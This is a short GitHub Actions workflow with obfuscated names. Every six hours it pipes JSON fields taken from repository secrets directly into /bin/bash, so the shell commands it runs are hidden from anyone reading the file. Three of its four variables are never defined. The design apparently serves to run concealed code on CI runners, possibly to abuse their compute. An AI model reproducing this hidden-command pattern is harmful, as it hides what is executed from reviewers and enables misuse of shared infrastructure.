name: panxiaoxia1616

on:
  workflow_dispatch:
  schedule:
    - cron: '32 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: panxiaoxia1616
        env:
          fc23: ${{ secrets.fc23 }}
        run: |
          echo $fc23 | jq -r .tdvv4795 | /bin/bash
          echo $fniu0 | jq -r .dbxm153 | /bin/bash
          echo $hjmi82744 | jq -r .fc513 | /bin/bash
          echo $zf92 | jq -r .jbc4099 | /bin/bash

